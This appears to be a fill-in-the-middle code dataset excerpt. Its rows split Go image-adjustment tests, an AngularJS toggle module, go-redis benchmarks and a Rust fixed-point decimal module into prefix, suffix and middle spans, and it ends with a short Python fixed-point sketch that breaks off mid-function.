file_name   string, length 3–137
prefix      string, length 0–918k
suffix      string, length 0–962k
middle      string, length 0–812k
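Each row below pairs a file_name with that file's text split into three spans: prefix and suffix hold the surrounding code, and middle holds the span to be filled in (for drpx-toggle.js, for example, the middle is the function name "find" that belongs between the prefix's trailing "function" and the suffix's "(name) {"). A minimal sketch of reassembling one row, assuming the rows are exposed as plain dicts keyed by the column names above:

```python
# Hypothetical row shaped like the columns above; the field names
# (file_name, prefix, middle, suffix) come from the header, but the
# dict access itself is an assumption about how the rows are loaded.
def reassemble(row: dict) -> str:
    """Concatenate the three spans back into the original file text."""
    return row["prefix"] + row["middle"] + row["suffix"]

row = {
    "file_name": "drpx-toggle.js",
    "prefix": "function ",   # ends just before the completion point
    "middle": "find",        # the span a model is asked to predict
    "suffix": "(name) { /* ... */ }",
}
print(reassemble(row))  # -> "function find(name) { /* ... */ }"
```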
adjustment_test.go
package bild import ( "image" "testing" ) func TestBrightness(t *testing.T)
func TestGamma(t *testing.T) { cases := []struct { desc string gamma float64 value image.Image expected *image.RGBA }{ { desc: "1.0", gamma: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "0", gamma: 0.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, }, }, }, { desc: "2.2", gamma: 2.2, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xba, 0xba, 0xba, 0x80, 0xba, 0xba, 0xba, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0xff, }, }, }, { desc: "0.5", gamma: 0.5, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x40, 0x40, 0x40, 0x80, 0x40, 0x40, 0x40, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0xff, }, }, }, } for _, c := range cases { actual := Gamma(c.value, c.gamma) if !rgbaImageEqual(actual, c.expected) { t.Error(testFailMessage("Gamma "+c.desc, c.expected, actual)) } } } func TestContrast(t *testing.T) { cases := []struct { desc string change float64 value image.Image expected *image.RGBA }{ { desc: "1.0", change: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "1.0", change: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x40, 0x40, 0x40, 0xFF, 0x40, 0x40, 0x40, 0xFF, 0xF0, 0xF0, 0xF0, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "0.0", change: 0.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xBA, 0xBA, 0xBA, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xBA, 0xBA, 0xBA, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "-0.5", change: -0.5, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x7F, 0x7F, 0x7F, 0x80, 0x7F, 0x7F, 0x7F, 0xff, 0xBF, 0xBF, 0xBF, 0xff, 0x3F, 0x3F, 0x3F, 0xff, }, }, }, { desc: "0.5", change: 0.5, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), 
Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0xff, }, }, }, } for _, c := range cases { actual := Contrast(c.value, c.change) if !rgbaImageEqual(actual, c.expected) { t.Error(testFailMessage("Contrast "+c.desc, c.expected, actual)) } } }
{ cases := []struct { desc string percent float64 value image.Image expected *image.RGBA }{ { desc: "+100%", percent: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xFF, 0xFF, 0xFF, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "+0%", percent: 0.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "+50%", percent: 0.50, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xC0, 0xC0, 0xC0, 0x80, 0xC0, 0xC0, 0xC0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "-100%", percent: -1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x0, 0x0, 0x0, 0x80, 0x0, 0x0, 0x0, 0xFF, 0x0, 0x0, 0x0, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, } for _, c := range cases { actual := Brightness(c.value, c.percent) if !rgbaImageEqual(actual, c.expected) { t.Error(testFailMessage("Brightness "+c.desc, c.expected, actual)) } } }
drpx-toggle.js
/* DrpxToggle: .isOpen() .toggle() .open() .close() drpxToggleFactory(name): DrpxToggle # service for given name with .destroy() to remove DrpxToggleController: delegates to a DrpxToggle .toggle <ANY drpx-toggle="toggle [as scopeName]">...</ANY> controller: DrpxToggleController */ ;(function(angular) { 'use strict'; angular .module('drpxToggle', []) .factory('DrpxToggle', DrpxToggleFactory) .factory('drpxToggleFactory', drpxToggleFactoryFactory) .controller('DrpxToggleController', DrpxToggleController) .directive('drpxToggle', drpxToggleDirective) ; function DrpxToggleFactory() { /*jshint validthis:true */ function DrpxToggle() { this.opened = false; } DrpxToggle.prototype.close = close; DrpxToggle.prototype.isOpen = isOpen; DrpxToggle.prototype.open = open; DrpxToggle.prototype.toggle = toggle; function close() { // jshint ignore:line this.opened = false; } function isOpen() { return this.opened; } function open() { // jshint ignore:line this.opened = true; } function toggle() { this.opened = !this.opened; } return DrpxToggle; } drpxToggleFactoryFactory.$inject = ['DrpxToggle']; function drpxToggleFactoryFactory ( DrpxToggle ) { function drpxToggleFactory(name) { var toggle; toggle = find(name); if (!toggle) { toggle = create(name); } return toggle; } var toggles = {}; function create(name) { var toggle; toggle = new DrpxToggle(); toggle.destroy = destroy.bind(null, name); toggles[name] = toggle; return toggle; } function destroy(name) { delete toggles[name]; } function
(name) { // no 'new' name can be stored if (name === 'new') { return; } return toggles[name]; } return drpxToggleFactory; } DrpxToggleController.$inject = ['DrpxToggle']; function DrpxToggleController ( DrpxToggle ) { this.toggle = new DrpxToggle(); } drpxToggleDirective.$inject = ['drpxToggleFactory']; function drpxToggleDirective ( drpxToggleFactory ) { var directive = { restrict: 'A', controller: 'DrpxToggleController', link: link, }; var expr = /^\s*([A-Za-z]\w*)(\s+as\s+([A-Za-z]\w*))?\s*$/; function link(scope, element, attrs, controller) { var as, match, name, toggle; match = attrs.drpxToggle.match(expr); if (match) { name = match[1]; as = match[3]; toggle = drpxToggleFactory(name); if (as) { scope[as] = toggle; } controller.toggle = toggle; } } return directive; } })(angular);
find
bench_test.go
package redis_test import ( "bytes" "testing" "time" "github.com/bukalapak/go-redis" ) func benchmarkRedisClient(poolSize int) *redis.Client
func BenchmarkRedisPing(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Ping().Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkRedisSetString(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() value := string(bytes.Repeat([]byte{'1'}, 10000)) b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", value, 0).Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkRedisGetNil(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Get("key").Err(); err != redis.Nil { b.Fatal(err) } } }) } func benchmarkSetRedis(b *testing.B, poolSize, payloadSize int) { client := benchmarkRedisClient(poolSize) defer client.Close() value := string(bytes.Repeat([]byte{'1'}, payloadSize)) b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", value, 0).Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkSetRedis10Conns64Bytes(b *testing.B) { benchmarkSetRedis(b, 10, 64) } func BenchmarkSetRedis100Conns64Bytes(b *testing.B) { benchmarkSetRedis(b, 100, 64) } func BenchmarkSetRedis10Conns1KB(b *testing.B) { benchmarkSetRedis(b, 10, 1024) } func BenchmarkSetRedis100Conns1KB(b *testing.B) { benchmarkSetRedis(b, 100, 1024) } func BenchmarkSetRedis10Conns10KB(b *testing.B) { benchmarkSetRedis(b, 10, 10*1024) } func BenchmarkSetRedis100Conns10KB(b *testing.B) { benchmarkSetRedis(b, 100, 10*1024) } func BenchmarkSetRedis10Conns1MB(b *testing.B) { benchmarkSetRedis(b, 10, 1024*1024) } func BenchmarkSetRedis100Conns1MB(b *testing.B) { benchmarkSetRedis(b, 100, 1024*1024) } func BenchmarkRedisSetGetBytes(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() value := bytes.Repeat([]byte{'1'}, 10000) b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", value, 0).Err(); err != nil { b.Fatal(err) } got, err := client.Get("key").Bytes() if err != nil { b.Fatal(err) } if !bytes.Equal(got, value) { b.Fatalf("got != value") } } }) } func BenchmarkRedisMGet(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() if err := client.MSet("key1", "hello1", "key2", "hello2").Err(); err != nil { b.Fatal(err) } b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.MGet("key1", "key2").Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkSetExpire(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", "hello", 0).Err(); err != nil { b.Fatal(err) } if err := client.Expire("key", time.Second).Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkPipeline(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { _, err := client.Pipelined(func(pipe redis.Pipeliner) error { pipe.Set("key", "hello", 0) pipe.Expire("key", time.Second) return nil }) if err != nil { b.Fatal(err) } } }) } func BenchmarkZAdd(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { err := client.ZAdd("key", redis.Z{ Score: float64(1), Member: "hello", }).Err() if err != nil { b.Fatal(err) } } }) }
{ client := redis.NewClient(&redis.Options{ Addr: ":6379", DialTimeout: time.Second, ReadTimeout: time.Second, WriteTimeout: time.Second, PoolSize: poolSize, }) if err := client.FlushDB().Err(); err != nil { panic(err) } return client }
decimal.rs
// Copyright Materialize, Inc. All rights reserved. // // Use of this software is governed by the Business Source License // included in the LICENSE file. // // As of the Change Date specified in that file, in accordance with // the Business Source License, use of this software will be governed // by the Apache License, Version 2.0. //! A specialized, high-performance decimal type. //! //! This module has a somewhat unusual design that is tightly coupled to //! Materialize's requirements. It is unlikely to be useful in other contexts //! without significant refactoring. If you're looking for a self-contained //! arbitrary precision decimal library in Rust, you probably want something //! like [bigdecimal]. //! //! The design supports 128-bit fixed point decimal arithmetic. Wikipedia has a //! good overview of [fixed-point arithmetic], if you're new to the subject. The //! basic idea is to scale decimal numbers up until no fractional component //! remains. Arithmetic operations are then simple integer arithmetic //! operations. //! //! For example, suppose we want to represent the decimal number 123.45. This //! number is said to have precision 5, because it has five digits in total, and //! scale 2, because it has two digits after the decimal point. We can represent //! this number as an integer by multiplying it by 100, resulting in 12345. We //! call this resulting number the "significand." //! //! Arithmetic operations can be performed directly on the significand using //! simple integer arithmetic. For example, suppose we want to add 1.55 to //! 123.45. The corresponding significands are 155 and 12345, respectively, and //! we can sum the significands directly, resulting in 12500. To display the //! result, we divide by 100 (the inverse of the multiplication by 100 that we //! performed to construct the significands originally), resulting in the //! correct decimal result 125.00. //! //! Note that multiplication and division require more care, to account for //! shifting scales, but the basic idea of relying on integral operations on the //! significand still holds. See the Wikipedia article for details if you're //! curious. //! //! This module does *not* provide a complete implementation of fixed-point //! decimal arithmetic. The types here instead provide interoperability, i.e., //! parsing decimals from other systems and printing decimals to strings. //! //! [bigdecimal]: https://crates.io/crates/bigdecimal //! [fixed-point arithmetic]: https://en.wikipedia.org/wiki/Fixed-point_arithmetic use std::cmp::PartialEq; use std::fmt; use std::hash::{Hash, Hasher}; use std::iter::Sum; use std::ops::{Add, AddAssign, Div, Mul, Neg, Rem, Sub}; use std::str::FromStr; use failure::{bail, format_err}; use serde::{Deserialize, Serialize}; /// The significand of a decimal number with up to 38 digits of precision. /// /// `Significand`s are unintepretable without their corresponding scale, which /// indicates the location of the decimal point. You may be interested in the /// [`Decimal`] type, which bundles the significand together with its scale. /// /// The advantage of the `Significand` type is that it uses less memory by not /// redundantly storing the scale if the scale is known to be the same across /// a large collection of decimals. /// /// Note that arithmetic on significands is raw 128-bit integer arithmetic. /// Multiplying two significands, for example, will simply multiply the two /// underlying 128-bit integers. 
It is up to the caller to interpret the result /// semantically, e.g., accounting for the new output scale, if decimal /// multiplication was desired. #[derive(Clone, Copy, Debug, Eq, Ord, PartialOrd, Serialize, Deserialize)] pub struct Significand(i128); /// The maximum precision (i.e., number of digits) permitted in a /// [`Significand`]. Note that this includes the total number of digits, /// including the digits both before and after the decimal point. /// /// This number was chosen so that significands fit neatly in an i128. pub const MAX_DECIMAL_PRECISION: u8 = 38; impl Significand { /// Constructs a new `Significand` from an `i128`. pub fn new(d: i128) -> Significand { Significand(d) } /// Parses a `Significand` from a buffer storing the two's complement /// representation of the significand in big-endian byte order. pub fn from_twos_complement_be(input: &[u8]) -> Result<Significand, failure::Error> { if input.len() > 16 { bail!("decimal exceeds maximum precision") } let mut buf = [0; 16]; for (i, digit) in input.iter().rev().enumerate() { buf[i] = *digit; } let mut significand = i128::from_le_bytes(buf); if !input.is_empty() && input.len() < 16 && ((input[0] & 0x80) != 0) { // This is tricky. In two's-complement representation, the weight of // the high order digit is negative. If we're filling out the entire // i128, then i128::from_le_bytes has already accounted for this. // Otherwise, if the high-order bit in this particular decimal is // set, we've incorrectly used it to contribute a positive weight. // // For example, consider the one-byte number 0xba. In one-byte two's // complement, this represents -70: // // 1(-2^7) + 0(2^6) + 1(2^5) + 1(2^4) + 1(2^3) + 0(2^2) + 1(2^1) + 0(2^0) // // We'll, however, have interpreted it as 186, because we'll have // assigned the highest bit a weight of 128, instead of -128. To // compensate, we subtract twice the weight of the highest digit-- // in the example, 256. significand -= 2_i128.pow((input.len() * 8) as u32); } Ok(Significand(significand)) } /// Returns the underlying `i128`. pub fn as_i128(&self) -> i128 { self.0 } pub fn abs(&self) -> Significand { Significand(self.0.abs()) } /// Constructs a [`Decimal`] by imbuing this `Significand` with the /// specified `scale`. 
pub fn with_scale(self, scale: u8) -> Decimal { Decimal { significand: self.0, scale, } } } impl Add<Significand> for Significand { type Output = Self; fn add(self, other: Self) -> Self { Self(self.0 + other.0) } } impl<T> Add<T> for Significand where i128: Add<T, Output = i128>, { type Output = Self; fn add(self, other: T) -> Self { Self(self.0 + other) } } impl AddAssign<Significand> for Significand { fn add_assign(&mut self, other: Self) { self.0 += other.0; } } impl<T> AddAssign<T> for Significand where i128: AddAssign<T>, { fn add_assign(&mut self, other: T) { self.0 += other; } } impl Sub<Significand> for Significand { type Output = Self; fn sub(self, other: Self) -> Self { Self(self.0 - other.0) } } impl<T> Sub<T> for Significand where i128: Sub<T, Output = i128>, { type Output = Self; fn sub(self, other: T) -> Self { Self(self.0 - other) } } impl Mul<Significand> for Significand { type Output = Self; fn mul(self, other: Self) -> Self { Self(self.0 * other.0) } } impl<T> Mul<T> for Significand where i128: Mul<T, Output = i128>, { type Output = Self; fn mul(self, other: T) -> Self { Self(self.0 * other) } } impl Div<Significand> for Significand { type Output = Self; fn div(self, other: Self) -> Self { Self(self.0 / other.0) } } impl<T> Div<T> for Significand where i128: Div<T, Output = i128>, { type Output = Self; fn div(self, other: T) -> Self { Self(self.0 / other) } } impl Rem<Significand> for Significand { type Output = Self; fn rem(self, other: Self) -> Self { Self(self.0 % other.0) } } impl<T> Rem<T> for Significand where i128: Rem<T, Output = i128>, { type Output = Self; fn rem(self, other: T) -> Self { Self(self.0 % other) } } impl PartialEq<Significand> for Significand { fn eq(&self, other: &Significand) -> bool { self.0 == other.0 } } impl PartialEq<i128> for Significand { fn eq(&self, other: &i128) -> bool { &self.0 == other } } impl Hash for Significand { fn hash<H: Hasher>(&self, state: &mut H) { self.0.hash(state) } } impl Sum for Significand { fn sum<I>(iter: I) -> Self where I: Iterator<Item = Self>, { iter.fold(Significand::new(0), Add::add) } } impl Neg for Significand { type Output = Self; fn neg(self) -> Self::Output { Self(-self.0) } } /// A decimal number, which bundles a significand and its scale. /// /// At present, the only useful operations that `Decimal`s support are /// conversions to and from strings. This support is thought to be complete, /// however; even esoteric format string options, like padding characters and /// width, are properly handled. #[derive(Debug, PartialEq, Eq)] pub struct Decimal { significand: i128, scale: u8, } impl Decimal { /// Returns the significand of the decimal. pub fn significand(&self) -> i128 { self.significand } /// Returns the scale of the decimal. pub fn scale(&self) -> u8 { self.scale } pub fn abs(&self) -> Decimal { Decimal { significand: self.significand.abs(), scale: self.scale, } } /// Computes the floor of this decimal: the nearest integer less than or /// equal to this decimal. The returned decimal will have the same scale as /// this decimal. pub fn floor(&self) -> Decimal { let factor = 10_i128.pow(self.scale as u32); let int = self.significand / factor; let frac = self.significand % factor; let sub = if int < 0 && frac != 0 { 1 } else { 0 }; Decimal { significand: (int - sub) * factor, scale: self.scale, } } /// Computes the ceiling of this decimal: the nearest integer greater than /// or equal to this decimal. The returned decimal will have the same scale /// as this decimal. pub fn
(&self) -> Decimal { let factor = 10_i128.pow(self.scale as u32); let int = self.significand / factor; let frac = self.significand % factor; let add = if int > 0 && frac != 0 { 1 } else { 0 }; Decimal { significand: (add + int) * factor, scale: self.scale, } } /// Rounds this decimal to `places` number of decimal places, rounding half /// away from zero. The returned decimal will have the same scale as this /// decimal. pub fn round(&self, places: i64) -> Decimal { let significand = if places <= self.scale as i64 { let scale = self.scale as i64 - places; let factor = 10_i128.pow(scale as u32); rounding_downscale(self.significand, scale as usize) * factor } else { self.significand }; Decimal { significand, scale: self.scale, } } } impl FromStr for Decimal { type Err = failure::Error; fn from_str(s: &str) -> Result<Self, Self::Err> { let mut significand: i128 = 0; let mut precision = 0; let mut scale: u8 = 0; let mut seen_decimal = false; let mut negative = false; let mut seen_e_notation = false; let mut e_exponent: u8 = 0; let mut e_negative = false; let mut z = s.chars().peekable(); if let Some('-') = z.peek() { // Consume the negative sign. z.next(); negative = true; } while let Some(&ch) = z.peek() { match ch { '0'..='9' => { let digit = ch .to_digit(10) .ok_or_else(|| format_err!("invalid digit in numeric literal: {}", s))?; precision += 1; if seen_decimal { scale += 1; } significand = significand .checked_mul(10) .ok_or_else(|| format_err!("numeric literal overflows i128: {}", s))?; significand = significand .checked_add(i128::from(digit)) .ok_or_else(|| format_err!("numeric literal overflows i128: {}", s))?; } '.' => { if !seen_decimal { seen_decimal = true; } else { bail!("multiple decimal points in numeric literal: {}", s) } } _ => break, } z.next(); } // Check for e-notation. // Note that 'e' is changed to 'E' during parsing step. if let Some('E') = z.peek() { // Consume the e-notation signifier. z.next(); seen_e_notation = true; if let Some('-') = z.peek() { // Consume the negative sign. 
z.next(); e_negative = true; } while let Some(&ch) = z.peek() { match ch { '0'..='9' => { let digit = ch.to_digit(10).ok_or_else(|| { format_err!("invalid digit in numeric literal: {}", s) })?; e_exponent = e_exponent.checked_mul(10).ok_or_else(|| { format_err!("exponent in e-notation overflows u8: {}", s) })?; e_exponent = e_exponent.checked_add(digit as u8).ok_or_else(|| { format_err!("exponent in e-notation overflows u8: {}", s) })?; } _ => break, } z.next(); } } if z.peek().is_some() { bail!("malformed numeric literal: {}", s); } if precision > MAX_DECIMAL_PRECISION { bail!("numeric literal exceeds maximum precision: {}", s); } if negative { significand *= -1; } if seen_e_notation { if e_negative { scale = scale.checked_add(e_exponent).ok_or_else(|| { format_err!("numeric literal exceeds maximum precision: {}", s) })?; if scale > MAX_DECIMAL_PRECISION { bail!("numeric literal exceeds maximum precision: {}", s); } } else if scale > e_exponent { scale -= e_exponent; } else { e_exponent -= scale; scale = 0; let p = 10_i128.checked_pow(e_exponent as u32).ok_or_else(|| { format_err!( "exponent in numeric literal {} overflows i128: 10^{}", s, e_exponent ) })?; significand = significand .checked_mul(p) .ok_or_else(|| format_err!("numeric literal overflows i128: {}", s))?; } } Ok(Decimal { scale, significand }) } } fn rounding_downscale(v: i128, scale: usize) -> i128 { if scale == 0 { v } else { let factor = 10_i128.pow(scale as u32); v / factor + (v % factor) / (factor / 2) } } impl fmt::Display for Decimal { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { // NOTE(benesch): `fmt:Formatter` uses "precision" to mean "how many // digits to display to the right of the decimal point," which we call // scale. let desired_scale = f.precision().unwrap_or(self.scale as usize); // A desired scale of zero is special because it requires rounding the // integral part. For all other desired scales, the rounding instead // applies to the fractional part. if desired_scale == 0 { let ip = rounding_downscale(self.significand, self.scale as usize); f.pad_integral(ip >= 0, "", &ip.abs().to_string()) } else { let significand = self.significand.abs(); let factor = 10_i128.pow(u32::from(self.scale)); let ip = significand / factor; let mut fp = significand - (ip * factor); let mut scale = self.scale as usize; if desired_scale < scale { // The format string requests less fractional digits than // present. Round to the desired scale. fp = rounding_downscale(fp, scale - desired_scale); scale = desired_scale; } // The fractional digits must have all leading zeros present to be // correct. Consider: .07 and .7 are very different numbers. let mut buf = format!("{}.{:0width$}", ip, fp, width = scale); for _ in scale..desired_scale { // The format string requests more fractional digits than // present. Fill in the missing digits as zeros. 
buf.push('0'); } f.pad_integral(self.significand >= 0, "", &buf) } } } #[cfg(test)] mod tests { use super::*; fn d(s: &str) -> Decimal { s.parse().unwrap() } #[test] fn test_floor() { assert_eq!(d("100.11").floor(), d("100.00")); assert_eq!(d("99.0").floor(), d("99.0")); assert_eq!(d("-40.1").floor(), d("-41.0")); } #[test] fn test_ceil() { assert_eq!(d("100.11").ceil(), d("101.00")); assert_eq!(d("99.0").ceil(), d("99.0")); assert_eq!(d("-40.1").ceil(), d("-40.0")); } #[test] fn test_round() { assert_eq!(d("100.11").round(1), d("100.10")); assert_eq!(d("99.0").round(2), d("99.0")); assert_eq!(d("-40.1").round(0), d("-40.0")); assert_eq!(d("-40.5").round(0), d("-41.0")); assert_eq!(d("55.5555").round(-2), d("100.0000")); assert_eq!(d("55.5555").round(-3), d("0.0000")); } #[test] fn test_parse_decimal() { assert_eq!(d("123.45"), Significand::new(12345).with_scale(2)); assert_eq!(d("12345E-2"), Significand::new(12345).with_scale(2)); assert_eq!(d("-123.45"), Significand::new(-12345).with_scale(2)); } #[test] fn test_format_decimal() { let pos = Significand::new(12345).with_scale(2); assert_eq!(format!("{}", pos), "123.45"); assert_eq!(format!("{:.2}", pos), "123.45"); assert_eq!(format!("{:.3}", pos), "123.450"); assert_eq!(format!("{:.7}", pos), "123.4500000"); assert_eq!(format!("{:+}", pos), "+123.45"); assert_eq!(format!("{:8}", pos), " 123.45"); assert_eq!(format!("{:^8}", pos), " 123.45 "); assert_eq!(format!("{:z^8}", pos), "z123.45z"); assert_eq!(format!("{:0}", pos), "123.45"); assert_eq!(format!("{:08}", pos), "00123.45"); let neg = Significand::new(-12345).with_scale(2); assert_eq!(format!("{}", neg), "-123.45"); assert_eq!(format!("{:z^9}", neg), "z-123.45z"); assert_eq!(format!("{:0}", neg), "-123.45"); assert_eq!(format!("{:09}", neg), "-00123.45"); assert_eq!(format!("{}", Significand::new(0).with_scale(0)), "0"); assert_eq!(format!("{}", Significand::new(0).with_scale(5)), "0.00000"); assert_eq!(format!("{:.0}", Significand::new(-10).with_scale(5)), "0"); assert_eq!(format!("{}", Significand::new(42).with_scale(0)), "42"); assert_eq!(format!("{:.0}", Significand::new(-6).with_scale(1)), "-1"); assert_eq!(format!("{:.0}", Significand::new(-19).with_scale(1)), "-2"); assert_eq!(format!("{:.0}", Significand::new(19).with_scale(1)), "2"); assert_eq!(format!("{}", Significand::new(70).with_scale(2)), "0.70"); assert_eq!(format!("{}", Significand::new(7).with_scale(2)), "0.07"); assert_eq!(format!("{:.1}", Significand::new(45).with_scale(2)), "0.5"); assert_eq!( format!("{:.1}", Significand::new(-45).with_scale(2)), "-0.5" ); assert_eq!(format!("{:.1}", Significand::new(46).with_scale(2)), "0.5"); assert_eq!( format!("{:.1}", Significand::new(-46).with_scale(2)), "-0.5" ); } }
ceil
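The decimal.rs module docs above walk through fixed-point arithmetic on significands (123.45 at scale 2 becomes 12345; adding 1.55 means adding 155; displaying divides by 100). A minimal sketch of that worked example in plain Python integers, not the crate's Significand/Decimal types:

```python
# Fixed-point sketch of the worked example from decimal.rs's module docs:
# scale both numbers up by 10**2 so no fractional part remains, add the
# resulting integers, and divide by the scale factor only for display.
SCALE = 2
FACTOR = 10 ** SCALE

def to_significand(s: str) -> int:
    """Parse a positive decimal string with exactly SCALE fractional digits."""
    whole, frac = s.split(".")
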